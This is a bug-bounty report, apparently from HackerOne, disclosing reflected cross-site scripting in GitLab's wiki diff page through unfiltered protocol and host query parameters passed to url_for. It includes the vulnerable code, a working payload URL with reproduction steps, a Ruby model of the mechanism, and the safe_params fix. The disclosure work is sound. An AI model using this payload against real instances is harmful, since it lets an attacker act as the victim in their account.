Cross-site scripting in wiki changes page affecting self-hosted instances running without strict CSP
HackerOne report #1730461 by ryotak
on 2022-10-11, assigned to GitLab Team
Report
Summary
Due to improper filtering of query parameters in the wiki changes page, an attacker can execute arbitrary JavaScript on self-hosted instances that run without a strict CSP.
Description
In app/views/projects/diffs/_diffs.html.haml, the following code is used to generate the link that toggles whitespace changes in the diff:

app/views/projects/diffs/_diffs.html.haml, line 24:
= toggle_whitespace_link(url_for(params_with_whitespace), class: 'd-none d-sm-inline-block')

app/helpers/diff_helper.rb, lines 280-282:
def params_with_whitespace
  hide_whitespace? ? request.query_parameters.except(:w) : request.query_parameters.merge(w: 1)
end

Because params_with_whitespace builds its hash from request.query_parameters instead of safe_params, arbitrary query parameters reach url_for and, through it, the link_to call inside toggle_whitespace_link. Since url_for treats keys such as protocol and host as URL-generation options rather than as query parameters, an attacker can make the generated link point at a javascript: URL and achieve XSS.
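To make the mechanism concrete, the following Ruby script is an added example and not GitLab's or Rails' code. It models, in deliberately simplified form, how url_for-style option handling turns the query string from the report's PoC URL into a javascript: link, shows why the payload is double-encoded (%250d survives Rack's decoding as %0d and becomes a carriage return only when the browser decodes the javascript: URL), and places the vulnerable helper shape beside a safe_params-style version that strips the URL-generation keys first. The instance host gl.example, the model_url_for function and the exact set of stripped keys (host, port, protocol) are assumptions.

```ruby
require 'uri'

# Constructed from the PoC URL in the report; the instance host is assumed.
ATTACK_PATH  = "/USERNAME/PROJECT_NAME/-/wikis/home/diff"
ATTACK_QUERY = "protocol=javascript&host=%250dalert(document.domain)//"
REQUEST      = { protocol: "https", host: "gl.example" }.freeze

# Rack percent-decodes the query string once, so request.query_parameters
# sees %250d as the literal three characters "%0d".
def query_parameters(query)
  URI.decode_www_form(query).to_h
end

# Simplified model of the url_for behaviour that matters here (NOT Rails'
# real implementation): "protocol" and "host" entries in the option hash
# override the request's scheme and host instead of becoming query params.
URL_OPTION_KEYS = %w[protocol host port].freeze

def model_url_for(params, path:, request: REQUEST)
  protocol = params.fetch("protocol", request[:protocol])
  host     = params.fetch("host", request[:host])
  query    = params.reject { |k, _| URL_OPTION_KEYS.include?(k) }
  url = "#{protocol}://#{host}#{path}"
  query.empty? ? url : "#{url}?#{URI.encode_www_form(query)}"
end

# The w toggle from params_with_whitespace, on string keys.
def toggle_w(params, hide_whitespace)
  hide_whitespace ? params.reject { |k, _| k == "w" } : params.merge("w" => "1")
end

# Vulnerable shape from the report: raw query parameters, w toggled,
# passed straight into url_for.
def whitespace_link_unsafe(query, hide_whitespace: false)
  model_url_for(toggle_w(query_parameters(query), hide_whitespace), path: ATTACK_PATH)
end

# Hardened shape: drop the URL-generation option keys before url_for sees
# them. GitLab's safe_params helper is assumed to do the same with
# params.except(:host, :port, :protocol).
def whitespace_link_safe(query, hide_whitespace: false)
  filtered = query_parameters(query).reject { |k, _| URL_OPTION_KEYS.include?(k) }
  model_url_for(toggle_w(filtered, hide_whitespace), path: ATTACK_PATH)
end

# What the browser executes when a javascript: link is clicked: the text
# after the scheme, percent-decoded once more. The leftover %0d becomes a
# carriage return, which JavaScript treats as a line terminator, so the
# leading "//" comment ends, alert(document.domain) runs, and the "//" that
# follows comments out the rest of the path and query.
def javascript_source(url)
  return nil unless url =~ /\Ajavascript:/i
  URI.decode_www_form_component(url.sub(/\Ajavascript:/i, ""))
end

if $PROGRAM_NAME == __FILE__
  unsafe = whitespace_link_unsafe(ATTACK_QUERY)
  puts "unsafe link: #{unsafe}"
  puts "browser runs: #{javascript_source(unsafe).inspect}"
  puts "safe link:   #{whitespace_link_safe(ATTACK_QUERY)}"
end
```

Running the script prints a javascript:// link for the vulnerable helper and an https://gl.example/... link for the filtered one; the inspected JavaScript source shows the "\r" that splits the comment from the alert call, which is the only reason the payload needs the extra layer of encoding.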
Steps to reproduce
Self-hosted instance (with an alert)
- Set up your own GitLab instance.
- Log in to the GitLab instance.
- Create a project.
- From the sidebar, click Wiki.
- Click Create your first page.
- Fill in the contents.
- Click Create page.
- Open https://YOUR_OWN_INSTANCE/USERNAME/PROJECT_NAME/-/wikis/home/diff?protocol=javascript&host=%250dalert(document.domain)//
- Click Hide whitespace changes.
- Confirm that alert(document.domain) has been executed.
GitLab.com (with a CSP error message)
- Log in to your GitLab account.
- Create a project.
- From the sidebar, click Wiki.
- Click Create your first page.
- Fill in the contents.
- Click Create page.
- Open https://gitlab.com/USERNAME/PROJECT_NAME/-/wikis/home/diff?protocol=javascript&host=%250dalert(document.domain)//
- Open DevTools.
- Click Hide whitespace changes.
- Confirm that CSP prevented the execution of JavaScript.
Examples
What is the current bug behavior?
request.query_parameters is used, which may include dangerous URL-generation parameters such as protocol and host.
What is the expected correct behavior?
safe_params should be used so that the dangerous parameters are filtered out before url_for is called.
Relevant logs and/or screenshots
Details of CVSS
Attack Vector: Network (Attacks can be performed over the internet.)
Attack Complexity: Low (Attack complexity shouldn't be affected by user interactions.)
Privileges Required: Low (An attacker needs to create a project before attacking the victim.)
User Interaction: Required (Clicks are required.)
Scope: Changed (The vulnerable component and the impacted component are different; GitLab server and the browser)
Confidentiality: High (Since an attacker can perform arbitrary actions on behalf of the user, this should be rated as High.)
Integrity: High (Same as above.)
Availability: None (Account takeover doesn't directly affect the availability.)
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version: 2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version: 6.4.2
Go Version: unknown
GitLab information
Version: 15.4.1-ee
Revision: 7b2ed8f038f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: https://gl.ryotak.me
HTTP Clone URL: https://gl.ryotak.me/some-group/some-project.git
SSH Clone URL: git@gl.ryotak.me:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
An attacker can execute arbitrary JavaScript in the victim's browser and perform any action on behalf of the user.